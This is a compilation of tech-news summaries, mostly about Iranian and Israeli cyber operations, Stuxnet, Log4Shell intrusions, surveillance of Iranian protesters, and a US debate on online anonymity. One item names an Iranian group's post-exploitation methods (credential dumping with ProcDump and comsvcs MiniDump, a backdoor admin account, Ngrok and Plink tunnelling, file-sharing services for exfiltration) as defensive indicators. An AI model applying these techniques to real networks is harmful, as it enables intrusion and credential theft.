An anonymous reader quotes a report from SecurityWeek.com: A Dutch engineer recruited by the country's intelligence services used a water pump to deploy the now-infamous Stuxnet malware in an Iranian nuclear facility, according to a two-year investigation conducted by Dutch newspaper De Volkskrant. Stuxnet, whose existence came to light in 2010, is widely believed to be the work of the United States and Israel, its goal being to sabotage Iran's nuclear program by compromising industrial control systems (ICS) associated with nuclear centrifuges. The malware, which had worm capabilities, is said to have infected hundreds of thousands of devices and caused physical damage to hundreds of machines.

De Volkskrant's investigation, which involved interviews with dozens of people, found that the AIVD, the general intelligence and security service of the Netherlands, the Dutch equivalent of the CIA, recruited Erik van Sabben, a then 36-year-old Dutch national working at a heavy transport company in Dubai. Van Sabben was allegedly recruited in 2005 -- a couple of years before the Stuxnet malware was triggered -- after American and Israeli intelligence agencies asked their Dutch counterpart for help. However, the Dutch agency reportedly did not inform its country's government and it was not aware of the full extent of the operation. Van Sabben was described as perfect for the job as he had a technical background, he was doing business in Iran and was married to an Iranian woman.

It's believed that the Stuxnet malware was planted on a water pump that the Dutch national installed in the nuclear complex in Natanz, which he had infiltrated. It's unclear if Van Sabben knew exactly what he was doing, but his family said he appeared to have panicked at around the time of the Stuxnet attack. [...] Michael Hayden, who at the time was the chief of the CIA, did agree to talk to De Volkskrant, but could not confirm whether Stuxnet was indeed delivered via water pumps due to it still being classified information. One interesting piece of information that has come to light in De Volkskrant's investigation is that Hayden reportedly told one of the newspaper's sources that it cost between $1 and $2 billion to develop Stuxnet.

An anonymous reader quotes a report from SecurityWeek: Albania's Parliament said on Tuesday that it had suffered a cyberattack with hackers trying to get into its data system, resulting in a temporary halt in its services. A statement said Monday's cyberattack had not "touched the data of the system," adding that experts were working to discover what consequences the attack could have. It said the system's services would resume at a later time. Local media reported that a cellphone provider and an air flight company were also targeted by Monday's cyberattacks, allegedly from Iranian-based hackers called Homeland Justice, which could not be verified independently.

Albania suffered a cyberattack in July 2022 that the government and multinational technology companies blamed on the Iranian Foreign Ministry. Believed to be in retaliation for Albania sheltering members of the Iranian opposition group Mujahedeen-e-Khalq, or MEK, the attack led the government to cut diplomatic relations with Iran two months later. The Iranian Foreign Ministry denied Tehran was behind an attack on Albanian government websites and noted that Iran has suffered cyberattacks from the MEK. In June, Albanian authorities raided a camp for exiled MEK members to seize computer devices allegedly linked to prohibited political activities. [...] In a statement sent later Tuesday to The Associated Press, MEK's media spokesperson Ali Safavi claimed the reported cyberattacks in Albania "are not related to the presence or activities" of MEK members in the country.

Four Republican candidates for U.S. president debated Wednesday — and moderator Megyn Kelly had a tough question for former South Carolina governor Nikki Haley. "Can you please speak to the requirement that you said that every anonymous internet user needs to out themselves?" Nikki Haley: What I said was, that social media companies need to show us their algorithms. I also said there are millions of bots on social media right now. They're foreign, they're Chinese, they're Iranian. I will always fight for freedom of speech for Americans; we do not need freedom of speech for Russians and Iranians and Hamas. We need social media companies to go and fight back on all of these bots that are happening. That's what I said.

As a mom, do I think social media would be more civil if we went and had people's names next to that? Yes, I do think that, because I think we've got too much cyberbullying, I think we've got child pornography and all of those things. But having said that, I never said government should go and require anyone's name.

DeSantis: That's false.

Haley: What I said —

DeSantis:You said I want your name. As president of the United States, her first day in office, she said one of the first things I'm going to do --

Haley: I said we were going to get the millions of bots.

DeSantis: "All social medias? I want your name." A government i.d. to dox every American. That's what she said. You can roll the tape. She said I want your name — and that was going to be one of the first things she did in office. And then she got real serious blowback — and understandably so, because it would be a massive expansion of government. We have anonymous speech. The Federalist Papers were written with anonymous writers — Jay, Madison, and Hamilton, they went under "Publius". It's something that's important — and especially given how conservatives have been attacked and they've lost jobs and they've been cancelled. You know the regime would use that to weaponize that against our own people. It was a bad idea, and she should own up to it.

Haley: This cracks me up, because Ron is so hypocritical, because he actually went and tried to push a law that would stop anonymous people from talking to the press, and went so far to say bloggers should have to register with the state --

DeSantis:That's not true.

Haley: — if they're going to write about elected officials. It was in the — check your newpaper. It was absolutely there.
DeSantis quickly attributed the introduction of that legislation to "some legislator".

The press had already extensively written about Haley's position on anonymity on social media. Three weeks ago Business Insider covered a Fox News interview, and quoted Nikki Haley as saying: "When I get into office, the first thing we have to do, social media companies, they have to show America their algorithms. Let us see why they're pushing what they're pushing. The second thing is every person on social media should be verified by their name." Haley said this was why her proposals would be necessary to counter the "national security threat" posed by anonymous social media accounts and social media bots. "When you do that, all of a sudden people have to stand by what they say, and it gets rid of the Russian bots, the Iranian bots, and the Chinese bots," Haley said. "And then you're gonna get some civility when people know their name is next to what they say, and they know their pastor and their family member's gonna see it. It's gonna help our kids and it's gonna help our country," she continued... A representative for the Haley campaign told Business Insider that Haley's proposals were "common sense."

"We all know that America's enemies use anonymous bots to spread anti-American lies and sow chaos and division within our borders. Nikki believes social media companies need to do a better job of verifying users so we can crack down on Chinese, Iranian, and Russian bots," the representative said.
The next day CNBC reported that Haley "appeared to add a caveat... suggesting Wednesday that Americans should still be allowed to post anonymously online." A spokesperson for Haley's campaign added, "Social media companies need to do a better job of verifying users as human in order to crack down on anonymous foreign bots. We can do this while protecting America's right to free speech and Americans who post anonymously."

Privacy issues had also come up just five minutes earlier in the debate. In March America's Treasury Secretary had recommended the country "advance policy and technical work on a potential central bank digital currency, or CBDC, so the U.S. is prepared if CBDC is determined to be in the national interest."

But Florida governor Ron DeSantis spoke out forecefully against the possibility. "They want to get rid of cash, crypto, they want to force you to do that. They'll take away your privacy. They will absolutely regulate your purchases. On Day One as president, we take the idea of Central Bank Digital Currency, and we throw it in the trash can. It'll be dead on arrival." [The audience applauded.]

British cybersecurity officials are warning that hacking groups linked to Russia and Iran are duping people into clicking malicious links by impersonating journalists and experts. From a report: The hackers, who have similar goals but are said to be working separately, have sought to steal emails from people working in academia, defense, the media and government, as well as from activists and non-governmental organizations, according to an advisory released on Thursday by the UK's National Cyber Security Centre. "These campaigns by threat actors based in Russia and Iran continue to ruthlessly pursue their targets in an attempt to steal online credentials and compromise potentially sensitive systems," said Paul Chichester, the center's director of operations. "We strongly encourage organizations and individuals to remain vigilant to potential approaches and follow the mitigation advice in the advisory to protect themselves online."

An anonymous reader quotes a report from Wired: Last month, a young woman went to work at Sarzamineh Shadi, or Land of Happiness, an indoor amusement park east of Iran's capital, Tehran. After a photo of her without a hijab circulated on social media, the amusement park was closed, according to multiple accounts in Iranian media. Prosecutors in Tehran have reportedly opened an investigation. Shuttering a business to force compliance with Iran's strict laws for women's dress is a familiar tactic to Shaparak Shajarizadeh. She stopped wearing a hijab in 2017 because she views it as a symbol of government suppression, and recalls restaurant owners, fearful of authorities, pressuring her to cover her head. But Shajarizadeh, who fled to Canada in 2018 after three arrests for flouting hijab law, worries that women like the amusement park worker may now be targeted with face recognition algorithms as well as by conventional police work.

After Iranian lawmakers suggested last year that face recognition should be used to police hijab law, the head of an Iranian government agency that enforces morality law said in a September interview that the technology would be used "to identify inappropriate and unusual movements," including "failure to observe hijab laws." Individuals could be identified by checking faces against a national identity database to levy fines and make arrests, he said. Two weeks later, a 22-year-old Kurdish woman named Jina Mahsa Amini died after being taken into custody by Iran's morality police for not wearing a hijab tightly enough. Her death sparked historic protests against women's dress rules, resulting in an estimated 19,000 arrests and more than 500 deaths. Shajarizadeh and others monitoring the ongoing outcry have noticed that some people involved in the protests are confronted by police days after an alleged incident -- including women cited for not wearing a hijab. "Many people haven't been arrested in the streets," she says. "They were arrested at their homes one or two days later."

Although there are other ways women could have been identified, Shajarizadeh and others fear that the pattern indicates face recognition is already in use -- perhaps the first known instance of a government using face recognition to impose dress law on women based on religious belief. Mahsa Alimardani, who researches freedom of expression in Iran at the University of Oxford, has recently heard reports of women in Iran receiving citations in the mail for hijab law violations despite not having had an interaction with a law enforcement officer. Iran's government has spent years building a digital surveillance apparatus, Alimardani says. The country's national identity database, built in 2015, includes biometric data like face scans and is used for national ID cards and to identify people considered dissidents by authorities.

Parts made by more than a dozen US and Western companies were found inside a single Iranian drone downed in Ukraine last fall, according to a Ukrainian intelligence assessment obtained exclusively by CNN. From the report: The assessment, which was shared with US government officials late last year, illustrates the extent of the problem facing the Biden administration, which has vowed to shut down Iran's production of drones that Russia is launching by the hundreds into Ukraine. CNN reported last month that the White House has created an administration-wide task force to investigate how US and Western-made technology -- ranging from smaller equipment like semiconductors and GPS modules to larger parts like engines -- has ended up in Iranian drones.

Of the 52 components Ukrainians removed from the Iranian Shahed-136 drone, 40 appear to have been manufactured by 13 different American companies, according to the assessment. The remaining 12 components were manufactured by companies in Canada, Switzerland, Japan, Taiwan, and China, according to the assessment. The options for combating the issue are limited. The US has for years imposed tough export control restrictions and sanctions to prevent Iran from obtaining high-end materials. Now US officials are looking at enhanced enforcement of those sanctions, encouraging companies to better monitor their own supply chains and, perhaps most importantly, trying to identify the third-party distributors taking these products and re-selling them to bad actors.

An anonymous reader quotes a report from BleepingComputer: The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware. The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability. After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency's network.

"In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence," the joint advisory reads. The two U.S. federal agencies added that all organizations who haven't yet patched their VMware systems against Log4Shell should assume that they've already been breached and advise them to start hunting for malicious activity within their networks.

CISA warned in June that VMware Horizon and Unified Access Gateway (UAG) servers are still being preyed upon by multiple threat actors, including state-sponsored hacking groups, using Log4Shell exploits. Log4Shell can be exploited remotely to target vulnerable servers exposed to local or Internet access to move laterally across breached networks to access internal systems that store sensitive data.

The Intercept reports that protesters in Iran "have often been left wondering how the government was able to track down their locations or gain access to their private communications — tactics that are frighteningly pervasive but whose mechanisms are virtually unknown."

But The Intercept now has evidence of a new possibility: While disconnecting broad swaths of the population from the web remains a favored blunt instrument of Iranian state censorship, the government has far more precise, sophisticated tools available as well. Part of Iran's data clampdown may be explained through the use of a system called "SIAM," a web program for remotely manipulating cellular connections made available to the Iranian Communications Regulatory Authority. The existence of SIAM and details of how the system works, reported here for the first time, are laid out in a series of internal documents from an Iranian cellular carrier that were obtained by The Intercept.

According to these internal documents, SIAM is a computer system that works behind the scenes of Iranian cellular networks, providing its operators a broad menu of remote commands to alter, disrupt, and monitor how customers use their phones. The tools can slow their data connections to a crawl, break the encryption of phone calls, track the movements of individuals or large groups, and produce detailed metadata summaries of who spoke to whom, when, and where. Such a system could help the government invisibly quash the ongoing protests — or those of tomorrow — an expert who reviewed the SIAM documents told The Intercept.

"SIAM can control if, where, when, and how users can communicate," explained Gary Miller, a mobile security researcher and fellow at the University of Toronto's Citizen Lab. "In this respect, this is not a surveillance system but rather a repression and control system to limit the capability of users to dissent or protest."
Thanks to long-time Slashdot reader mspohr for submitting the article.

"Iran's state-run broadcaster was apparently hacked on air Saturday," reports the BBC, "with a news bulletin interrupted by a protest against the country's leader."

While such incidents are "historically rare," they add that more recently,this incident follows "widespread open dissent" It comes after at least three people were shot dead when protesters clashed with security forces in new unrest over the death of Mahsa Amini. s Amini was detained in Tehran by morality police for allegedly not covering her hair properly. The 22-year-old Iranian Kurd died in custody on 16 September, three days after her arrest. Her death has sparked an unprecedented wave of protest across the country.

Saturday's TV news bulletin at 21:00 (17:30 GMT) was interrupted with images which included Iran's supreme leader with a target on his head, photos of Ms Amini and three other women killed in recent protests. e of the captions read "join us and rise up", whilst another said "our youths' blood is dripping off your paws".

The interruption lasted only a few seconds before being cut off.
Thanks to Nodsnarb and ttyler (long-time Slashdot reader #20,687) for sharing the story.

Elon Musk announced that he was activating Starlink in response to U.S. Secretary of State Antony Blinken's tweet announcing the issuing of a General License to provide the Iranian people with access to digital communications. Teslarati reports: Currently, in Iran, massive protests are happening as a result of the death of 22-year-old Mahsa Amini, who was detained by the morality police for her head scarf not being properly worn. Although she had no known heart-related health problems, the police said she suddenly died of heart failure. Eyewitnesses said that she was beaten and her head hit the side of a police car. This along with leaked medical scans suggested cerebral hemorrhage and stroke. In response to her death, there have been several large-scale protests across Iran that received international support from world leaders, celebrities, and organizations.

The Iranian government sided with the morality police and has been suppressing the protests, shooting protestors with metal pellets and birdshot, and deploying tear gas and water cannons. The government also blocked access to many apps including Instagram and WhatsApp and limited internet access to prevent protestors from organizing. This is where Starlink comes in. A few days ago, Elon Musk said that Starlink would seek exemption from Iranian sanctions. This was in response to @Erfankasraie who asked if Elon could provide Starlink to the Iranian people. "It could be a game changer for the future." Elon also responded, "OK," to @agusantonetti who asked if he could do the same for other countries under a dictatorship such as Cuba. Further reading: As Unrest Grows, Iran Restricts Access To Instagram, WhatsApp

The US government's cyber defense agency is recommending for the first time that companies embrace automated continuous testing to protect against longstanding online threats. From a report: The guidance, from a cluster of US and international agencies published on Wednesday, urges businesses to shore up their defenses by continually validating their security program against known threat behaviors, rather than a more piecemeal approach. "The authoring agencies recommend continually testing your security program, at scale," according to an alert from the Cybersecurity and Infrastructure Security Agency and several other US and international agencies. The alert warned malicious cyber actors allegedly affiliated with the Iranian Government's Islamic Revolutionary Guard Corps are exploiting known vulnerabilities for ransom operations. An official at CISA told Bloomberg ahead of the announcement that emulating adversaries and testing against them is key to defending against cyberattacks. Central to the effort is a freely available list of cyberattackers' most common tactics and procedures that was first made public in 2015 by MITRE, a federally funded research and development center, and is now regularly updated. While many organizations and their security contractors already consult that list, too few check if their systems can actually detect and overcome them, the CISA official said.

Albania cut diplomatic ties with Iran and expelled the country's embassy staff over a major cyberattack nearly two months ago that was allegedly carried out by Tehran on Albanian government websites, the prime minister said Wednesday. From a report: The move by Albania, a NATO country, was the first known case of a country cutting diplomatic relations over a cyberattack. The White House vowed unspecified retaliation Wednesday against Iran for what it called "a troubling precedent for cyberspace." In a statement, the White House said it has had experts on the ground for weeks helping Albania and had concluded Iran was behind the "reckless and irresponsible" attack and subsequent hack-and-leak operation.

The government's decision was formally delivered to the Iranian Embassy in Tirana, the capital, in an official note, Prime Minister Edi Rama said. All embassy staff, including diplomatic and security personnel, were ordered to leave Albania within 24 hours. On July 15, a cyberattack temporarily shut down numerous Albanian government digital services and websites. Rama said an investigation determined that the cyberattack wasn't carried out by individuals or independent groups, calling it "state aggression."

Slashdot reader artmancc writes: Like aircraft, many of the world's ocean-going vessels are required to have transponders that broadcast their location. The information is public and can be seen on websites such as AIS Marine Traffic. But according to an analysis reported in The New York Times , a maritime data company called Windward "has uncovered more than 500 cases of ships manipulating their satellite navigation systems to hide their locations."

The article, by Anatoly Kurmanaev, highlights the Cyprus-registered tanker Reliant, which was observed taking on oil at a Venezuelan refinery last December. At the same time, however, the ship was reporting its position as some 300 nautical miles (about 500 kilometers) away, "drifting innocuously off the coast of St. Lucia."
It's illegal (under international law), but the rapidly-growing practice lets ships circumvent international laws and sanctions, the Times reports, and "could transform how goods are moved around the world, with profound implications for the enforcement of international law, organized crime and global trade." Its use has included Chinese fishing fleets hiding operations in protected waters off South America, tankers concealing stops in Iranian oil ports, and container ships obfuscating journeys in the Middle East. A U.S. intelligence official, who discussed confidential government assessments on the condition of anonymity, said the deception tactic had already been used for weapons and drug smuggling. After originally discovering the deception near countries under sanction, Windward has since seen it spread as far as Australia and Antarctica.

"It's a new way for ships to transmit a completely different identity," said Matan Peled, a founder of Windward. "Things have unfolded at just an amazing and frightening speed...." The spread of AIS manipulation shows how easy it has become to subvert its underlying technology — the Global Positioning System, or GPS — which is used in everything from cellphones to power grids, said Dana Goward, a former senior U.S. Coast Guard official and the president of Resilient Navigation and Timing Foundation, a Virginia-based GPS policy group. "This shows just how vulnerable the system is," he said.

The FBI thwarted a planned cyberattack on a children's hospital in Boston that was to have been carried out by hackers sponsored by the Iranian government, FBI Director Christopher Wray said Wednesday. From a report: Wray told a Boston College cybersecurity conference that his agents learned of the planned digital attack from an unspecified intelligence partner and got Boston Children's Hospital the information it needed last summer to block what would have been "one of the most despicable cyberattacks I've seen."

"And quick actions by everyone involved, especially at the hospital, protected both the network and the sick kids who depended on it," Wray said. The FBI chief recounted that anecdote in a broader speech about ongoing cyber threats from Russia, China and Iran and the need for partnerships between the U.S. government and the private sector.

The BBC reports: A Persian-language content moderator for Instagram and a former content moderator have said Iranian intelligence officials offered them money to remove Instagram accounts of journalists and activists....

Both content moderators also accused some Iranian colleagues of exhibiting "pro-regime bias" when reviewing posts on the photo-sharing service. They spoke to the BBC after many Iranian Instagram users complained that posts about recent anti-government protests in their country had been deleted. Instagram's owner, Meta Platforms, and the third-party company it uses to moderate content said there was no validity to the claims....

The protests received very little coverage on Iranian state media, meaning that Iranians had to rely on Instagram and other social media sites to learn what was happening on the ground. As the unrest continued, users noticed that some videos posted on Instagram were being removed....

The former content moderator told the BBC that he "personally knew some reviewers who supported the Iranian regime and received instructions from Iran"....

All three interviewees said it was likely that some videos of the protests were removed because they included people shouting: "Death to Khamenei".

Meta has previously said that its guidelines around incitement of violence prohibit calls for the death of a head of state. However, in Iran the phrase "Death to..." is commonly chanted at protests to express discontent with something or someone, rather than to express an actual threat.

An anonymous reader quotes a report from Ars Technica: On Monday, the Internet got a much better look at military facilities across Russia. Google Maps stopped obscuring the sensitive locations due to Russia's ongoing invasion of its neighbor Ukraine. The Ukrainian Armed Forces announced the end of Google's censorship of Russia's bases on Twitter. Thanks to former US President Donald Trump, we know that the 0.5 m per pixel resolution available on Google Maps' satellite view is a far cry from the images available to the US government. But it will be invaluable to the growing mass of open source intelligence analysts. Since Russia's invasion of Ukraine began in late February, the OSINT community on Twitter has been cataloging Russian losses by geolocating images of destroyed tanks, fighting vehicles, aircraft, and cruise missile attacks.

Twitter users have already identified some interesting sights. Images taken of a Russian airbase at Lipetsk show partially disassembled MiG-31s (or perhaps MiG-25s). Another shows several Sukhoi fighter jets painted in patriotic colors, at least one of which is also missing its wings. Zhukovsky Airport near Moscow shows some oddities parked outside thanks to its role as a test flight center, including a Buran shuttle and a Sukhoi Su-47 technology demonstrator. UPDATE: A Google spokesperson told Ars that the company hasn't changed anything with regard to blurring out sensitive sites in Russia, so perhaps none of us were looking closely until now.

An anonymous reader quotes a report from Ars Technica: Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, researchers said on Thursday. Security firm SentinelOne has dubbed the group TunnelVision. The name is meant to emphasize TunnelVision's heavy reliance on tunneling tools and the unique way it deploys them. In the past, TunnelVision has exploited so-called 1-day vulnerabilities -- meaning vulnerabilities that have been recently patched -- to hack organizations that have yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group's better-known targets. [...] The SentinelOne research shows that the targeting continues and that this time the target is organizations running VMware Horizon, a desktop and app virtualization product that runs on Windows, macOS, and Linux.

Apache Tomcat is an open source Web server that VMware and other enterprise software use to deploy and serve Java-based Web apps. Once installed, a shell allows the hackers to remotely execute commands of their choice on exploited networks. The PowerShell used here appears to be a variant of this publicly available one. Once it's installed, TunnelVision members use it to: Execute reconnaissance commands; Create a backdoor user and adding it to the network administrators group; Harvest credentials using ProcDump, SAM hive dumps, and comsvcs MiniDump; and Download and run tunneling tools, including Plink and Ngrok, which are used to tunnel remote desktop protocol traffic.

The hackers use multiple legitimate services to achieve and obscure their activities. Those services include: transfer.sh, pastebin.com, webhook.site, ufile.io, and raw.githubusercontent.com. People who are trying to determine if their organization is affected should look for unexplained outgoing connections to these legitimate public services.

Iranians couldn't buy gas. Israelis found their intimate dating details posted online. The Iran-Israel shadow war is now hitting ordinary citizens. From a report: Millions of ordinary people in Iran and Israel recently found themselves caught in the crossfire of a cyberwar between their countries. In Tehran, a dentist drove around for hours in search of gasoline, waiting in long lines at four gas stations only to come away empty. In Tel Aviv, a well-known broadcaster panicked as the intimate details of his sex life, and those of hundreds of thousands of others stolen from an L.G.B.T.Q. dating site, were uploaded on social media. For years, Israel and Iran have engaged in a covert war, by land, sea, air and computer, but the targets have usually been military or government related. Now, the cyberwar has widened to target civilians on a large scale. In recent weeks, a cyberattack on Iran's nationwide fuel distribution system paralyzed the country's 4,300 gas stations, which took 12 days to have service fully restored.

That attack was attributed to Israel by two U.S. defense officials, who spoke on the condition of anonymity to discuss confidential intelligence assessments. It was followed days later by cyberattacks in Israel against a major medical facility and a popular L.G.B.T.Q. dating site, attacks Israeli officials have attributed to Iran. The escalation comes as American authorities have warned of Iranian attempts to hack the computer networks of hospitals and other critical infrastructure in the United States. As hopes fade for a diplomatic resurrection of the Iranian nuclear agreement, such attacks are only likely to proliferate. Hacks have been seeping into civilian arenas for months. Iran's national railroad was attacked in July, but that relatively unsophisticated hack may not have been Israeli. And Iran is accused of making a failed attack on Israel's water system last year. The latest attacks are thought to be the first to do widespread harm to large numbers of civilians. Nondefense computer networks are generally less secure than those tied to state security assets.

The U.S. government, along with counterparts in Australia and the U.K, have warned that Iranian state-backed hackers are targeting U.S. organizations in critical infrastructure sectors -- in some cases with ransomware. From a report: The rare warning linking Iran with ransomware landed in a joint advisory Wednesday, issued by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K's National Cyber Security Centre (NCSC). The advisory said that Iran-backed attackers have been exploiting Fortinet vulnerabilities since at least March and a Microsoft Exchange ProxyShell vulnerability since October to gain access to U.S. critical infrastructure organizations in the transport and public health sectors, as well as organizations in Australia. The aim of the hackers is ultimately to leverage this access for follow-on operations such as data exfiltration, extortion and ransomware deployment. In May this year, for example, the hackers abused Fortigate gear to access a web server hosting the domain for a U.S. municipal government. The following month, CISA and the FBI observed the hackers exploiting Fortinet vulnerabilities to access the networks of a U.S.-based hospital specializing in healthcare for children. The joint advisory has been released alongside a separate report from Microsoft on the evolution of Iranian APTs, which are "increasingly utilizing ransomware to either collect funds or disrupt their targets." In the report, Microsoft said it has been tracking six Iranian threat groups that have been deploying ransomware and exfiltrating data in attacks that started in September 2020.

Iran's president said Wednesday that a cyberattack which paralyzed every gas station in the Islamic Republic was designed to get "people angry by creating disorder and disruption," as long lines still snaked around the pumps a day after the incident began. NPR reports: Ebrahim Raisi's remarks stopped short of assigning blame for the attack, which rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump. However, his remarks suggested that he and others in the theocracy believe anti-Iranian forces carried out the assault. "There should be serious readiness in the field of cyberwar and related bodies should not allow the enemy to follow their ominous aims to make problem in trend of people's life," Raisi said. No group has claimed responsibility for the attack that began Tuesday, though it bore similarities to another months earlier that seemed to directly challenge Iran's Supreme Leader Ayatollah Ali Khamenei as the country's economy buckles under American sanctions.

On Wednesday morning, IRNA quoted another official who claimed 80% of Iran's gas stations had begun selling fuel again. Associated Press journalists saw long lines at multiple gas stations in Tehran. One station had a line of 90 cars waiting for fuel. Those buying ended up having to pay at higher, unsubsidized prices. Tuesday's attack rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump. The semiofficial ISNA news agency, which first called the incident a cyberattack, said it saw those trying to buy fuel with a government-issued card through the machines instead receiving a message reading "cyberattack 64411." While ISNA didn't acknowledge the number's significance, that number is associated with a hotline run through Khamenei's office that handles questions about Islamic law. ISNA later removed its reports, claiming that it too had been hacked. Such claims of hacking can come quickly when Iranian outlets publish news that angers the theocracy.